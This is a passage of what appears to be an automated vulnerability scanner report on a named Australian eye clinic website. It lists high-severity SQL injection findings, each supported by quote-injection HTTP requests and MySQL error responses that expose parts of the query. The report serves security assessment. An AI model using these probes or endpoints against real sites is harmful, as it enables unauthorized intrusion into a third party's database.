Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 21:53:16 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 196
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') ORDER BY old_url DESC LIMIT 1' at line 3
Request 2
GET /cmsAdmin''/uploads/BLEPHARITIS.pdf&s=204.93 HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 21:53:16 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 5388
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equi ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /cmsAdmin/uploads'/BLEPHARITIS.pdf&s=204.93 HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 21:53:17 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 196
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') ORDER BY old_url DESC LIMIT 1' at line 3
Request 2
GET /cmsAdmin/uploads''/BLEPHARITIS.pdf&s=204.93 HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 21:53:17 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 5388
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equi ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /cmsAdmin/uploads/BLEPHARITIS.pdf'&s=204.93 HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 21:53:17 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 196
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') ORDER BY old_url DESC LIMIT 1' at line 3
Request 2
GET /cmsAdmin/uploads/BLEPHARITIS.pdf''&s=204.93 HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 21:53:18 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 5388
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equi ...[SNIP]...
1.15. http://www.baysideeyes.com.au/cmsAdmin/uploads/BLEPHARITIS.pdf&s=204.93 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.baysideeyes.com.au
Path: /cmsAdmin/uploads/BLEPHARITIS.pdf&s=204.93
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /cmsAdmin/uploads/BLEPHARITIS.pdf&s=204.93?1'=1 HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 21:53:12 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 196
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') ORDER BY old_url DESC LIMIT 1' at line 3
Request 2
GET /cmsAdmin/uploads/BLEPHARITIS.pdf&s=204.93?1''=1 HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 21:53:13 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 5388
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equi ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /cmsAdmin'/uploads/privacy.htm HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:19 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 196
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') ORDER BY old_url DESC LIMIT 1' at line 3
Request 2
GET /cmsAdmin''/uploads/privacy.htm HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:20 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 5388
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equi ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /cmsAdmin/uploads'/privacy.htm HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:23 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 196
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') ORDER BY old_url DESC LIMIT 1' at line 3
Request 2
GET /cmsAdmin/uploads''/privacy.htm HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:24 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 5388
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equi ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /cmsAdmin/uploads/privacy.htm' HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:29 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 226
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''cmsAdmin/uploads/privacy.htm'') ORDER BY old_url DESC LIMIT 1' at line 3
Request 2
GET /cmsAdmin/uploads/privacy.htm'' HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:30 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 5388
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equi ...[SNIP]...
1.19. http://www.baysideeyes.com.au/cmsAdmin/uploads/privacy.htm [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.baysideeyes.com.au
Path:
/cmsAdmin/uploads/privacy.htm
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /cmsAdmin/uploads/privacy.htm?1'=1 HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:01 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 196
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') ORDER BY old_url DESC LIMIT 1' at line 3
Request 2
GET /cmsAdmin/uploads/privacy.htm?1''=1 HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:01 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 5388
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equi ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /favicon.ico' HTTP/1.1 Host: www.baysideeyes.com.au Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''favicon.ico'') ORDER BY old_url DESC LIMIT 1' at line 3
Request 2
GET /favicon.ico'' HTTP/1.1 Host: www.baysideeyes.com.au Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equi ...[SNIP]...
1.21. http://www.baysideeyes.com.au/favicon.ico [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.baysideeyes.com.au
Path:
/favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /favicon.ico?1'=1 HTTP/1.1 Host: www.baysideeyes.com.au Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') ORDER BY old_url DESC LIMIT 1' at line 3
Request 2
GET /favicon.ico?1''=1 HTTP/1.1 Host: www.baysideeyes.com.au Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /referrer-information.htm' HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:55 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 222
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''referrer-information.htm'') ORDER BY old_url DESC LIMIT 1' at line 3
Request 2
GET /referrer-information.htm'' HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:56 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 5388
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equi ...[SNIP]...
1.23. http://www.baysideeyes.com.au/referrer-information.htm [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.baysideeyes.com.au
Path:
/referrer-information.htm
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /referrer-information.htm?1'=1 HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:38 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 196
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') ORDER BY old_url DESC LIMIT 1' at line 3
Request 2
GET /referrer-information.htm?1''=1 HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:39 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 5388
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equi ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /sitemap.htm' HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:37 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 209
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''sitemap.htm'') ORDER BY old_url DESC LIMIT 1' at line 3
Request 2
GET /sitemap.htm'' HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:38 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 5388
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equi ...[SNIP]...
1.25. http://www.baysideeyes.com.au/sitemap.htm [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.baysideeyes.com.au
Path:
/sitemap.htm
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /sitemap.htm?1'=1 HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:25 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 196
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') ORDER BY old_url DESC LIMIT 1' at line 3
Request 2
